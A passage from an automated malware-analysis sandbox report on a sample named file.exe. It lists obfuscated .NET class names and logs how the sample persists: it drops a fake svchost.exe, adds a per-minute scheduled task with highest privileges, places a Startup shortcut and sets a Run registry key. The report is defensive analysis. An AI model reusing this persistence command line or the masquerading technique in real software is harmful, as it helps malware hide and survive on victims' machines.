                  Source: svchost.exe.0.dr, aTyp4zdr7PWoY7yPB1HPKF7KaU9euWm7Dk5Krr5JV4qrSsUHcriImerWCgTplK7zRKiNfoXa3Ge67XHotQU60xBtJ8aXDQD.cs | High entropy of concatenated method names: 'MzhLZg0kBXgQJBqhXKR6IFFTxRk46y82hBGaGM7pgVMvmen2L7OijPvKm0Vpst1lmuuR4i2xyEvIe4YjrkQRtoaQLCr60kB', 'mdtq64VWI9UDHwFjNIujpkSpHcqb4LO7xEWyoj7rCrLsIhN0fpEF3QXczHhsxLIFP8hjCjZ2il0YGkYPo8AKuhjDM07dCeE', 'RaXaMZVo7nmo8HmTXnchTW1c39QnXklSdjqBFSgfJKzReVqH38n29xezdSXahfU3FqHQXja7US46QOKhdH5TqgL1TIyxHxK', 'hpxrO9lHZ6xwksMIczZ8iE5GU7xaEbqbps4bVYrnw56oVy49Ef4dVoJ7zE8Tgx4P4crZN7upY33YIj7h4aZrVedHJvzsGuP', 'H6c0spaFMhUx7BwrU88KHvlbTu7ZdUAw17YWd0AM4TPmmht2e6EUIZKo4ZYLTAOqRhXl3DiKckyfKlECLPHEg4TOr5FaIbb', 'BOLrYdREAu7YNI2QeZKOzwFV4qlmpKZLYslgrUQrRlv33dvDbrenujU6OYVQgt7eGV6CNeowazc2togmGmA3Bz5jesaA9kh', '_5DA7hCEjltuvNA3G7njPLqSUecSRIv7aLkPIMVQpL4tIeev0mGEEWq4mxq57lDnG19RuuUFbYmtqJ6WfS1N7TkHjudGNAGX', 'JqpykSZiAlfZlfFNZltf6ro7xqBSmAN24blsxOvy4xXn8MQlvrcGr3EJn0OzjrbaCA6znZG095GPhMDJJrylTVnLZ8VydXB', 'NBBOvdG7lOl160aIetgUtUcGfJFYBnCMTwZuGCD34YJFUW3QbNPxdign8V4JILQrpn40DjxusIRdyWkiLdFNi2P1NJdpJha', 'BgCpiVaL6yoKrzUeGYjZAZkQXOMbmjTmJGqmt'
                  Source: svchost.exe.0.dr, Ft7ETrblGx06bJdGyU6mLTVZb1mxifdKIkz2S.cs | High entropy of concatenated method names: 'pV5GNxReLWRbJztxWoN9sFbvGSFZA9fztkgnX', 'IOD7ZNPqydZyQrn5bZEMryMseoy6VAlio52eF', 'R39w72dzlEQ0qHulDtuOonikHSqEMz2NNJoaF', 'F42jEzeOcNEd2Xt58ZYU0JTUk4RuRfxSZIdV6', 'RfDT7ZFrHp324DJgP9zgER7W7kOeiCRZk0fAd', 'jBk8hvmnS9ilhVS4ZvHDvZBpchL7mKgqUuSuA', 'MLSNXeBlz3HyiYeZo2CitJ2y6N1IpQ7vUQpHU', 'SsXmo3zo4c7qvLlX8zcoGrsl7P55Zt2yzDNdR', '_4uT9QBxjLIJ3XEoWHbPcxsOzOyLm5JU7UWKVa', '_5JXNMvFXLbhlzKyb8f6IiKdKM0xqlLinDIokq'
                  Source: svchost.exe.0.dr, 5FAgCtsKSrrC2VMWNGrWCx0.cs | High entropy of concatenated method names: 'XeZMHJ5Sai1NRcru3Ksv6Ao', 'KzE02pfGPuRw4Lp7HTgcV3W', 'uBURafDYEtltxUsxFTjURcZ', 'XuRibjFAKdTHjD3wsDvnXcY', 'lrGpa5TteqC7tSW6sipLB26', 'XWjMSZoEYV0x7mxEB9Yx8VO', 'EYJIG6PNQGOackyfhbbyQDZ', 'LOZhRT5vgBz7uxt9rznhXXp', 'XKWOYKGBIlqUFPfHLq3g2NZ', 'm44KyzrvV1sefEns8DE0CeX'
                  Source: svchost.exe.0.dr, 0m7DX7crYXoCR8NrxmQllWedGea94IvRkI5hOaDUfmiEXgVr36rOaeB.cs | High entropy of concatenated method names: 'QQWfdSG2xS4lD5bdBiEH1OpHPVxK7zcqFJKcXkutmFFjW7lDs4KuW16', 'jOxMM1N6OjprS07QpryZOFHddsoSjtz6kyIjtixcdbs7nE0jBYKdi5S', '_3a4q8G8H205iQsHOGehEiHoyUu9W5Tg8uF0usym5wOEsfoyB9KjBkDa', '_6HtZ7DyNcZ9QQHh5LzZvGDCNX8L3uRTB7yjimyzJa0vQoaG4Vbj6Rg3', 'QB2eNRYXINSW56QGLZXnFf6IpEnxt5NiwqCVzLK5AwXjhxcE5DvHZyQ', 'e7sI67VGSfSlIIKJZphNPZkmILVbC2Kg8g1UvzqyhybiBsnmeImcgtY', 'sGXHqYwXDZULYxK8gSGYFH4cRNvjM5OIf4NawRCEvYC721KExnK2hND', 'kCgCM7V1Aft4M3fuVYkOlVVEVriD7DTHnBI8ucFhzcRT3U8QXzmqy4l', 'OyDSV5z034Qg6wwSXL4llGVREs2vVJxntGddCJt0', 'zkJnnEAC1oKgBY8kIOZK9FA5Ahiu6ZgHhEZO6smM'
                  Source: svchost.exe.0.dr, CIAEoroYTz20oxLDfIq24NCv1lscIOM7d4NWixY3jd4Gdfeqwwosi7VBlwqCIKnTk7Oljc5g.cs | High entropy of concatenated method names: 'VvUamQexaLlDSalFARrQ9qHIOZJfWN1iZ4ag2Lp7oXLz1MRSGNPbsd8Gt5Sr6obsftbYOmO9', 'zG3nb7fsHCEEysakSCoXMtXSWtu6P63EXfJ4trA16aN5TL0jpYPB67f1mF6VV5pI8Vhj3eH7', 'cv6Qnju0tteEsmlaLOWtJAIUXwmlh8WAwx7FxLcPmRTLURaW9D1BRuDD3JBghv32kkwIhqCl', 'WrTjibEG30Y876mYzzNigsYB4cCBy7OQP84LInxtko3aFLXPPwSmYXWBWNILr5vufz9siHuD', 'dHmqVMg6wdknYUDXNdNz9ouCv8mvI06UYX7QIYMIhYj1LrLh6JCxpEwD0hqsQbk2pbkrbJIa', 'gLf7Z007cJpisow', 'uZj9L9WKLXAHIID', 'nf23VrFvRsIEPgv', 'eNb920YNU2Y66xb', '_1e9PhazEhD3rZcw'
                  Source: svchost.exe.0.dr, 8KcBCZ9DCxKcKbF0FzfHqT16Ch1DMyJIO0Y5GGZtWjWIgyYVuRr4V5O.cs | High entropy of concatenated method names: 'rmYdAier1qI05Aechiv2ssjdZX9qhSbgOaAJ7uH4HlEgIdQL8TMnynq', 'X6bs1VKVEz', '_7vCg3MX6UP', 'f4ewYMWxqB', 'qGDDMD7OAG'
                  Source: svchost.exe.0.dr, ktrFv2sOGwgIA9mekycjF1J3zeN8nu5eTtArKzFhw4oWEqfOdr8PLFPBGGJc0G4nBLrrbImb.cs | High entropy of concatenated method names: 'D6awLwsnT57uNrWDTfeufUJG8coJ97yfrz6Shub48ttMidXaru6dE3ivDB2dT21wtypsvoIR', 'oc58B3p2e5VnNQkOzhef7lvysxQIFgrPZE7JwlyZW4NBEwbfqNgAGIGVhCN5C4euuvceBcCN', '_7hAEB9ijwrrolHvJH8x4xi1rQvEB5e4QwJeG3oIPmOwkKOVvFmTGhBZmbB4Z6pP57exSfdz8', 'j8Vl82dVthVO8INk3TupIUVcYJlhMamIQteNscY8sgRTPoUlGMbTLIKSPGluQlA0F5ikg1iR', '_1Ojp6wqZet', 'qdN8pelKqa', 'p1ATG6liVR', 'fxU4QSNMBd', 'zwpeOddA3A', 'HKX8PLsgAD'
                  Source: 0.2.file.exe.38a3c18.2.raw.unpack, AT1vo9WlRDG78s57RQktIveZO6A7XG2wSAp52yLkcZAyHIEmoK5eN0R1pokjZt6.cs | High entropy of concatenated method names: 'lsLMB0k1mzOloo8L67rwcvTn0PZhhQocNpqxrwQ4gZkiPqVhR3', 'PtZKB104eh9CXN8DSCxtOSNrPlKhxbRLgwm4Whiva4Typ1w8lV', 'bOqWL3TZwKGlR8VnMWcZeCD1LgqwmLWtdPNdRcm08gZwO78AgX', 'zQDsgPoZ144gf52sfvMHDOLPS599rx910W7UaPWeEwZXZc5Pt8'
                  Source: 0.2.file.exe.38a3c18.2.raw.unpack, q8AGBWimCNl26cs.cs | High entropy of concatenated method names: 'pZG5FXTSQuziM5E', 'ZmgSJl8jUzxoda8', '_0KVNAk1dEQ98X0Y', '_9ifKH25q3nDqSHFXQDeQvIYDKqY', 'AQX1Gb1tuXIRXwV6LksEWs67NGQ', 'nrgYWWZT2Lbyyb0vzoXRhEWXsHp', 'FPp3q0Y24Jm0EGBhqrolWxQYYZ9', 'F7Eqbs2zS4TAU12Bv03bK0xZGyE', 'bQLATnzcempqKkBM1uQeYDjVNRT', 'zlm0V5w9judwigvxCjy0rjzLpRP'
                  Source: 0.2.file.exe.38a3c18.2.raw.unpack, FY4tA6CMaVa4guGqTEmyXIf7xvr3iNtk7Lq6zTl2t38pIELcmF7U9sPLA2fruofSqNCGhqcw5vlPs.cs | High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'tLd6ptJk33gbJAxVlr6JpGgKPGf0ATucNTSIQhMaD7O9MuOdgL', 'co1TLDrVkALa47756wT5Aih9k9LZYiSN7q6MDJ5Unl8LVnx3we', 'zYV42teDCCOEQB2bAsM1EDFpIYOhXm1hrpHNUyy8ROihue5G9m', '_5BlJwQSBtEeu8F40wMj6UFGwhUot5idctNfpZ5OQnh3qGsDyHd'
                  Source: 0.2.file.exe.38a3c18.2.raw.unpack, aTyp4zdr7PWoY7yPB1HPKF7KaU9euWm7Dk5Krr5JV4qrSsUHcriImerWCgTplK7zRKiNfoXa3Ge67XHotQU60xBtJ8aXDQD.cs | High entropy of concatenated method names: 'MzhLZg0kBXgQJBqhXKR6IFFTxRk46y82hBGaGM7pgVMvmen2L7OijPvKm0Vpst1lmuuR4i2xyEvIe4YjrkQRtoaQLCr60kB', 'mdtq64VWI9UDHwFjNIujpkSpHcqb4LO7xEWyoj7rCrLsIhN0fpEF3QXczHhsxLIFP8hjCjZ2il0YGkYPo8AKuhjDM07dCeE', 'RaXaMZVo7nmo8HmTXnchTW1c39QnXklSdjqBFSgfJKzReVqH38n29xezdSXahfU3FqHQXja7US46QOKhdH5TqgL1TIyxHxK', 'hpxrO9lHZ6xwksMIczZ8iE5GU7xaEbqbps4bVYrnw56oVy49Ef4dVoJ7zE8Tgx4P4crZN7upY33YIj7h4aZrVedHJvzsGuP', 'H6c0spaFMhUx7BwrU88KHvlbTu7ZdUAw17YWd0AM4TPmmht2e6EUIZKo4ZYLTAOqRhXl3DiKckyfKlECLPHEg4TOr5FaIbb', 'BOLrYdREAu7YNI2QeZKOzwFV4qlmpKZLYslgrUQrRlv33dvDbrenujU6OYVQgt7eGV6CNeowazc2togmGmA3Bz5jesaA9kh', '_5DA7hCEjltuvNA3G7njPLqSUecSRIv7aLkPIMVQpL4tIeev0mGEEWq4mxq57lDnG19RuuUFbYmtqJ6WfS1N7TkHjudGNAGX', 'JqpykSZiAlfZlfFNZltf6ro7xqBSmAN24blsxOvy4xXn8MQlvrcGr3EJn0OzjrbaCA6znZG095GPhMDJJrylTVnLZ8VydXB', 'NBBOvdG7lOl160aIetgUtUcGfJFYBnCMTwZuGCD34YJFUW3QbNPxdign8V4JILQrpn40DjxusIRdyWkiLdFNi2P1NJdpJha', 'BgCpiVaL6yoKrzUeGYjZAZkQXOMbmjTmJGqmt'
                  Source: 0.2.file.exe.38a3c18.2.raw.unpack, Ft7ETrblGx06bJdGyU6mLTVZb1mxifdKIkz2S.cs | High entropy of concatenated method names: 'pV5GNxReLWRbJztxWoN9sFbvGSFZA9fztkgnX', 'IOD7ZNPqydZyQrn5bZEMryMseoy6VAlio52eF', 'R39w72dzlEQ0qHulDtuOonikHSqEMz2NNJoaF', 'F42jEzeOcNEd2Xt58ZYU0JTUk4RuRfxSZIdV6', 'RfDT7ZFrHp324DJgP9zgER7W7kOeiCRZk0fAd', 'jBk8hvmnS9ilhVS4ZvHDvZBpchL7mKgqUuSuA', 'MLSNXeBlz3HyiYeZo2CitJ2y6N1IpQ7vUQpHU', 'SsXmo3zo4c7qvLlX8zcoGrsl7P55Zt2yzDNdR', '_4uT9QBxjLIJ3XEoWHbPcxsOzOyLm5JU7UWKVa', '_5JXNMvFXLbhlzKyb8f6IiKdKM0xqlLinDIokq'
                  Source: 0.2.file.exe.38a3c18.2.raw.unpack, 5FAgCtsKSrrC2VMWNGrWCx0.cs | High entropy of concatenated method names: 'XeZMHJ5Sai1NRcru3Ksv6Ao', 'KzE02pfGPuRw4Lp7HTgcV3W', 'uBURafDYEtltxUsxFTjURcZ', 'XuRibjFAKdTHjD3wsDvnXcY', 'lrGpa5TteqC7tSW6sipLB26', 'XWjMSZoEYV0x7mxEB9Yx8VO', 'EYJIG6PNQGOackyfhbbyQDZ', 'LOZhRT5vgBz7uxt9rznhXXp', 'XKWOYKGBIlqUFPfHLq3g2NZ', 'm44KyzrvV1sefEns8DE0CeX'
                  Source: 0.2.file.exe.38a3c18.2.raw.unpack, 0m7DX7crYXoCR8NrxmQllWedGea94IvRkI5hOaDUfmiEXgVr36rOaeB.cs | High entropy of concatenated method names: 'QQWfdSG2xS4lD5bdBiEH1OpHPVxK7zcqFJKcXkutmFFjW7lDs4KuW16', 'jOxMM1N6OjprS07QpryZOFHddsoSjtz6kyIjtixcdbs7nE0jBYKdi5S', '_3a4q8G8H205iQsHOGehEiHoyUu9W5Tg8uF0usym5wOEsfoyB9KjBkDa', '_6HtZ7DyNcZ9QQHh5LzZvGDCNX8L3uRTB7yjimyzJa0vQoaG4Vbj6Rg3', 'QB2eNRYXINSW56QGLZXnFf6IpEnxt5NiwqCVzLK5AwXjhxcE5DvHZyQ', 'e7sI67VGSfSlIIKJZphNPZkmILVbC2Kg8g1UvzqyhybiBsnmeImcgtY', 'sGXHqYwXDZULYxK8gSGYFH4cRNvjM5OIf4NawRCEvYC721KExnK2hND', 'kCgCM7V1Aft4M3fuVYkOlVVEVriD7DTHnBI8ucFhzcRT3U8QXzmqy4l', 'OyDSV5z034Qg6wwSXL4llGVREs2vVJxntGddCJt0', 'zkJnnEAC1oKgBY8kIOZK9FA5Ahiu6ZgHhEZO6smM'
                  Source: 0.2.file.exe.38a3c18.2.raw.unpack, CIAEoroYTz20oxLDfIq24NCv1lscIOM7d4NWixY3jd4Gdfeqwwosi7VBlwqCIKnTk7Oljc5g.cs | High entropy of concatenated method names: 'VvUamQexaLlDSalFARrQ9qHIOZJfWN1iZ4ag2Lp7oXLz1MRSGNPbsd8Gt5Sr6obsftbYOmO9', 'zG3nb7fsHCEEysakSCoXMtXSWtu6P63EXfJ4trA16aN5TL0jpYPB67f1mF6VV5pI8Vhj3eH7', 'cv6Qnju0tteEsmlaLOWtJAIUXwmlh8WAwx7FxLcPmRTLURaW9D1BRuDD3JBghv32kkwIhqCl', 'WrTjibEG30Y876mYzzNigsYB4cCBy7OQP84LInxtko3aFLXPPwSmYXWBWNILr5vufz9siHuD', 'dHmqVMg6wdknYUDXNdNz9ouCv8mvI06UYX7QIYMIhYj1LrLh6JCxpEwD0hqsQbk2pbkrbJIa', 'gLf7Z007cJpisow', 'uZj9L9WKLXAHIID', 'nf23VrFvRsIEPgv', 'eNb920YNU2Y66xb', '_1e9PhazEhD3rZcw'
                  Source: 0.2.file.exe.38a3c18.2.raw.unpack, 8KcBCZ9DCxKcKbF0FzfHqT16Ch1DMyJIO0Y5GGZtWjWIgyYVuRr4V5O.cs | High entropy of concatenated method names: 'rmYdAier1qI05Aechiv2ssjdZX9qhSbgOaAJ7uH4HlEgIdQL8TMnynq', 'X6bs1VKVEz', '_7vCg3MX6UP', 'f4ewYMWxqB', 'qGDDMD7OAG'
                  Source: 0.2.file.exe.38a3c18.2.raw.unpack, ktrFv2sOGwgIA9mekycjF1J3zeN8nu5eTtArKzFhw4oWEqfOdr8PLFPBGGJc0G4nBLrrbImb.cs | High entropy of concatenated method names: 'D6awLwsnT57uNrWDTfeufUJG8coJ97yfrz6Shub48ttMidXaru6dE3ivDB2dT21wtypsvoIR', 'oc58B3p2e5VnNQkOzhef7lvysxQIFgrPZE7JwlyZW4NBEwbfqNgAGIGVhCN5C4euuvceBcCN', '_7hAEB9ijwrrolHvJH8x4xi1rQvEB5e4QwJeG3oIPmOwkKOVvFmTGhBZmbB4Z6pP57exSfdz8', 'j8Vl82dVthVO8INk3TupIUVcYJlhMamIQteNscY8sgRTPoUlGMbTLIKSPGluQlA0F5ikg1iR', '_1Ojp6wqZet', 'qdN8pelKqa', 'p1ATG6liVR', 'fxU4QSNMBd', 'zwpeOddA3A', 'HKX8PLsgAD'

                  Persistence and Installation Behavior

                  Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Roaming\svchost.exe
                  Source: C:\Users\user\AppData\Roaming\All function.exe | File created: C:\Users\user\AppData\Roaming\ALL slumzick.exe
                  Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Roaming\All function.exe

                  Boot Survival

                  Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe"
                  Source: C:\Users\user\AppData\Roaming\svchost.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk
                  Source: C:\Users\user\AppData\Roaming\svchost.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run svchost

                  Hooking and other Techniques for Hiding and Protection

                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\All function.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exe    Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
